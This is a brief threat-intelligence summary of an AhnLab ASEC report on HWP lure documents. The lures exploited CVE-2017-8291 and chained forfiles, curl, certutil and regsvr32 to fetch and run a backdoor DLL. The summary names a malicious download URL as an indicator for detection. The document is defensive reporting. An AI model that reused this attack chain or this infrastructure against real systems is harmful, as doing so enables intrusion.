AhnLab ASEC reported HWP malware distributed around South Korea’s academic conference season, including an online conference support-themed lure document. The document exploited the EPS vulnerability CVE-2017-8291 and used Windows utilities such as forfiles.exe, curl.exe, certutil.exe, and regsvr32 to execute commands, download a Base64-encoded DLL, decode it, and run the payload. The payload was detected as Backdoor/Win64.Akdoor and retrieved content from thestreetsmartsalesman.com/wp-content/uploads/wp-logs/category.php. The source does not attribute the activity to a named actor, but the tradecraft gives defenders concrete detection points around HWP/EPS exploitation, living-off-the-land utilities, and the listed download infrastructure.